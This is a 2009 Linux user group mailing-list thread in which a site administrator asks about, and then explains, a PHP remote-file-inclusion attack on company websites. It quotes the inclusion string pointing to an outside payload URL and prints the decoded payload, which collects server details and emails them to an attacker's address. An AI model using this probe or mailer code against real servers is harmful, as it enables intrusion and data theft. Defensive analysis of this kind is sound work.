[NTLUG:Discuss] http://sito.blackdrag0n.net/Cartoon/idnew.txt?

m m llliiilll at hotmail.com
Mon May 11 13:06:06 CDT 2009 

 

All,
 
Finally figured out. This is a hacker try to steal information of your server ip, web server user... and email it to fr33sh3ll at gmail.com
 
What serious about this? it can be nothing to destroy your server depends on your web user. in other words, if you run php as apache module, this bad guy can put executable code do as all web user can do.
 
 
 
for those who wants to know a little details, here are decrypted code:  

 

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); 
($safe_mode)?($safez="ON"):($safez="OFF_HEHE"); 
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname(); 
 
$ip = getenv("REMOTE_ADDR"); 
$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); 
$subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; 
$from ="From: ".$writ."___=".$safez."<TOOL@".$_SERVER['HTTP_HOST'].""; 
 
mail( $creator, $subj, $msg, $from);
 
note:
base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==") = fr33sh3ll at gmail.com

 

 

 


 
> From: llliiilll at hotmail.com
> To: discuss at ntlug.org
> Date: Mon, 11 May 2009 14:48:05 +0000
> Subject: [NTLUG:Discuss] http://sito.blackdrag0n.net/Cartoon/idnew.txt?
> 
> 
> Any have the idea about this hack?
> 
> 
> 
> ?_SERVER[DOCUMENT_ROOT]=http://sito.blackdrag0n.net/Cartoon/idnew.txt?
> 
> 
> 
> I have googled it. not many information about it. it seems a new hack.
> 
> 
> 
> What happened is it make my company's web sites do down. I have not figure how/why make the web site goes down, nut here is a little detail:
> 
> 
> 
> one of the application cause the problem. This application is allow user create account and upload image/movies files.
> 
> When upload movies files, it will automatically convert to flv format file and deleted the original movie files. after we disable this application, the problem solved. This is not necessary cause the problem. I just mention it.
> 
> 
> 
> Any commands are welcome.
> 
> 
> 
> Thanks. 
> 
> _________________________________________________________________
> Windows Live™: Keep your life in sync.
> http://windowslive.com/explore?ocid=TXT_TAGLM_BR_life_in_synch_052009
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss

_________________________________________________________________
Insert movie times and more without leaving Hotmail®.
http://windowslive.com/Tutorial/Hotmail/QuickAdd?ocid=TXT_TAGLM_WL_HM_Tutorial_QuickAdd1_052009

More information about the Discuss mailing list